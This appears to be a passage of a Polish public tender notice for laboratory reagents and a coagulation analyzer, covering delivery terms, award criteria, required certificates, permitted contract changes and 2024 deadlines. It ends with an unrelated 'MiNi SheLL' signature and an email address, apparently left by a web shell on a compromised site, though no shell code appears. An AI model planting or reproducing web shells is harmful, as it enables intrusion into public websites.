Analizator do Kogulologii, stanowiącej załącznik Nr 7 do SWZ<br/>4.	Zamawiający przewiduje możliwość mniejszej realizacji przedmiotu zamówienia, nie mniej niż 60% wartości każdej części określonej w umowie z Wykonawcą.<br/>5.	Zamawiający zastrzega sobie prawo do zmian ilościowych w ramach danej części zamówienia do granicy wartości podpisanej umowy na daną część.<br/>6.	Zamawiający wymaga realizacji dostaw odczynników maksymalnie w ciągu 5 dni roboczych, w godz. od 8:00-18:00 od poniedziałku do piątku licząc od momentu złożenia zamówienia.<br/>7.	Terminy dostaw do 3 dni roboczych licząc od dnia złożenia zamówienia są dodatkowo oceniane.<br/>8.	Określając ilość opakowań oferowanego asortymentu w Formularzu cenowym, w kolumnach pn. „ilość zaoferowanych opakowań” należy uwzględnić także termin ważności asortymentu określony przez Wykonawcę w kolumnie pn.„deklarowany przez Wykonawcę okres ważności oferowanego asortymentu w msc od daty dostawy” a także okres ważności asortymentu po jego otwarciu (jeśli dotyczy).”<br/>9. Dostawa, instalacja i podłączenie analizatora do informatycznego systemu laboratoryjnego (jeśli dotyczy) w ciągu 5 dni roboczych od podpisania umowy. Koszt podłączenia do informatycznego systemu laboratoryjnego po stronie Wykonawcy.<br/>10.	W przypadku odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową zamówienia będą składane według ustalonego harmonogramu.<br/>11.	W przypadku zaoferowania przez Wykonawcę wyrobów w opakowaniach o innej wielkości niż określona w załączniku nr 5 do SWZ, na Wykonawcy ciąży obowiązek prawidłowej kalkulacji ilości opakowań. W sytuacji, gdy nie jest możliwa dostawa dokładnej ilości zapotrzebowanych wyrobów z uwagi na sposób ich konfekcjonowania u Wykonawców, Zamawiający dopuszcza modyfikację ich ilości przy zastosowaniu zasady zaokrąglania w górę, tj. kalkulacji takiej ilości sztuk (opakowań), którą Zamawiający będzie musiał zakupić, aby zostało zrealizowane jego zapotrzebowanie, przy założeniu powstania pewnej nadwyżki.<br/>12.	Wszystkie oferowane przedmioty, które są zaklasyfikowane jako wyroby medyczne do diagnostyki in vitro muszę spełniać wymogi ustawy o wyrobach medycznych (deklaracje, certyfikaty, kody UDI). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33696200-7 - Odczynniki do badania krwi</p> <p class="mb-0">38434000-6 - Analizatory</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy odczynników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego – według wzoru nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	W celu potwierdzenia zgodności oferowanych dostaw z wymaganiami określonymi przez Zamawiającego w dokumentach zamówienia, Zamawiający żąda złożenia wraz z ofertą:<br/>1)	Katalogi producenta, ulotki odczynnikowe (w języku polskim) zawierające opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie wymagań Zamawiającego oraz numer katalogowy. W/w dokumenty powinny być oznaczone Częścią zamówienia i pozycją, której dotyczą oraz mieć zaznaczony numer katalogowy, zgodny z numerem katalogowym w Formularzu cenowym.<br/>2)	Oświadczenie, że Wykonawca posiada wymagane w Ustawie o wyrobach medycznych z dnia 7 kwietnia 2022 deklaracje zgodności i certyfikaty dla produktów zaklasyfikowanych jako wyroby medyczne do diagnostyki in vitro, a dla pozostałych oświadczenie, że nie zostały do tej grupy zaklasyfikowane. Po rozstrzygnięciu postępowania należy niezwłocznie dostarczyć w/w deklaracje i certyfikaty. Jeżeli deklaracja zgodności była sporządzona przed 26 maja 2022 roku, a w czasie trwania umowy kończy się okres przejściowy i oferowany produkt wymagać będzie certyfikatu, Wykonawca zobowiązany jest taki certyfikat dostarczyć. Dotyczy to również certyfikatów, które w czasie trwania umowy tracą swą ważność.<br/>2.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie Wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	Katalogi producenta, ulotki odczynnikowe (w języku polskim) zawierające opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie wymagań Zamawiającego oraz numer katalogowy. W/w dokumenty powinny być oznaczone Częścią zamówienia i pozycją, której dotyczą oraz mieć zaznaczony numer katalogowy, zgodny z numerem katalogowym w Formularzu cenowym.<br/>2)	Oświadczenie, że Wykonawca posiada wymagane w Ustawie o wyrobach medycznych z dnia 7 kwietnia 2022 deklaracje zgodności i certyfikaty dla produktów zaklasyfikowanych jako wyroby medyczne do diagnostyki in vitro, a dla pozostałych oświadczenie, że nie zostały do tej grupy zaklasyfikowane. Po rozstrzygnięciu postępowania należy niezwłocznie dostarczyć w/w deklaracje i certyfikaty. Jeżeli deklaracja zgodności była sporządzona przed 26 maja 2022 roku, a w czasie trwania umowy kończy się okres przejściowy i oferowany produkt wymagać będzie certyfikatu, Wykonawca zobowiązany jest taki certyfikat dostarczyć. Dotyczy to również certyfikatów, które w czasie trwania umowy tracą swą ważność. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszcza się zmiany niniejszej umowy w przypadku:<br/>a)	zmiany numeru katalogowego produktu ( zmiana nr katalogowego nie wymaga aneksowania umowy),<br/>b)	zmiany nazwy handlowej produktu przy zachowaniu jego parametrów,<br/>c)	gdy wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,<br/>d)	gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym, <br/>o parametrach nie gorszych od produktu objętego umową,<br/>e)	w przypadku zaprzestania produkcji - produkt zastąpiony produktem równoważnym, <br/>o parametrach nie gorszych od produktu objętego umową,<br/>f)	zmiany sposobu konfekcjonowania asortymentu,<br/>g)	zmiany liczby opakowań,<br/>h)	zmiany Wykonawcy w ramach zmian właścicielskich w podmiocie realizującym umowę, jeśli nowy Wykonawca przedłoży odpowiednie dokumenty potwierdzające zmianę oraz złoży oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunków udziału w postępowaniu. <br/>2.	Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.<br/>3.	Zmiany postanowień zawartej umowy mogą nastąpić za zgodą obu stron wyrażoną na piśmie <br/>w formie aneksu do umowy, za wyj. ust. 1 lit. a) i c), gdzie Wykonawca informuje Zamawiającego na piśmie o zmianie numeru katalogowego lub przejściowym brakiem produktów.<br/>Pozostałe zmiany określono w par. 11 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składac na platformie zakupowej zamawiającego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-02 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com